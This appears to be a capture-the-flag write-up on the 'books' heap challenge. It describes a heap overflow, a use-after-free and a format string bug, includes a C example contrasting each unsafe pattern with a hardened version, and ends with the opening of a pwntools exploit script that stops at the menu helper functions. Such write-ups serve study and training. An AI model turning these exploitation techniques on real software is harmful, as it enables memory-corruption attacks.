Two very good, detailed walkthroughs by experts can be found online:
https://blog.csdn.net/qq_43449190/article/details/89077783
https://bbs.pediy.com/thread-246783.htm
Only the payload is recorded here.
The binary has five functions:
- Edit order 1
- Edit order 2
- Delete order 1
- Delete order 2
- Submit
Among them, Edit order writes input into the space allocated earlier but does not check the length, so an over-long order overflows the chunk.
Delete order frees the space allocated earlier but does not clear the pointer, so the freed chunk can still be edited or deleted again.
Finally there is also a printf(dst) call,
a deliberately planted format string vulnerability.
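As an added illustration (not code from the write-up or from the books binary), here are the three defects just described, each modelled in C as the unsafe pattern in a comment next to a hardened replacement: a bounded edit, a delete that clears the slot, and a submit with a fixed format string. The names, the 32-byte allocation size and the two-slot layout are assumptions.

```c
/* Added example, not code from the write-up or the "books" challenge binary.
 * It models the three defects the write-up attributes to the binary (an edit
 * with no length check, a delete that frees without clearing the pointer, and
 * printf(dst) with user data as the format string) and shows the hardened
 * form of each. Names, sizes and the two-slot layout are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ORDER_SIZE 32          /* assumed allocation size per order */
#define NORDERS 2              /* "order 1" and "order 2" */

static char *orders[NORDERS];  /* heap buffers, NULL when not allocated */

/* Allocate slot idx; refuses out-of-range indexes and already-live slots. */
int alloc_order(int idx) {
    if (idx < 0 || idx >= NORDERS || orders[idx] != NULL) return -1;
    orders[idx] = calloc(1, ORDER_SIZE);
    return orders[idx] ? 0 : -1;
}

/* Unsafe pattern described in the write-up: strcpy(orders[idx], src) with no
 * bound, so input longer than ORDER_SIZE spills into the neighbouring chunk.
 * Hardened: reject input that does not fit, terminator included. */
int edit_safe(int idx, const char *src) {
    if (idx < 0 || idx >= NORDERS || orders[idx] == NULL) return -1;
    size_t n = strlen(src);
    if (n >= ORDER_SIZE) return -2;
    memcpy(orders[idx], src, n + 1);
    return 0;
}

/* Unsafe pattern: free(orders[idx]) while the pointer is kept, so a later
 * edit writes into freed memory and a later delete frees it twice.
 * Hardened: clear the slot so both are refused by the NULL check above. */
int delete_safe(int idx) {
    if (idx < 0 || idx >= NORDERS || orders[idx] == NULL) return -1;
    free(orders[idx]);
    orders[idx] = NULL;
    return 0;
}

/* Unsafe pattern: printf(dst), which lets '%' directives inside dst control
 * what printf reads. Hardened: a fixed format string; dst is only ever data.
 * Returns the number of characters printed. */
int submit_safe(const char *dst) {
    return printf("%s\n", dst);
}

/* Helper for checks: attempt an edit with a 63-byte string, which the
 * hardened edit must refuse. */
int try_oversize_edit(int idx) {
    char big[64];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    return edit_safe(idx, big);
}

int main(void) {
    alloc_order(0);
    printf("edit ok: %d\n", edit_safe(0, "hello"));
    printf("oversize edit: %d\n", try_oversize_edit(0));
    printf("submit: %d\n", submit_safe(orders[0]));
    printf("delete: %d\n", delete_safe(0));
    printf("second delete: %d\n", delete_safe(0));
    printf("edit after free: %d\n", edit_safe(0, "x"));
    return 0;
}
```

The NULL check in edit_safe and delete_safe is what the original Delete order lacks: once the slot is cleared, neither an edit of the freed chunk nor a second free is possible through the menu.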
```python
#coding:utf-8
from pwn import *

context(arch='amd64', os='linux')
context.log_level = 'debug'

io = process("./books")
p = ELF("./books")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

def edit(index, content):
    # pick the "Edit order" menu entry by index, then send the new order
    io.recvuntil(b"Submit\n")
    io.sendline(str(index).encode())
    io.recvuntil(b"order:\n")
    io.sendline(content)

def delete(index):
    # pick the "Delete order" menu entry by index
    io.recvuntil(b"Submit\n")
    io.sendline(str(index).encode())
```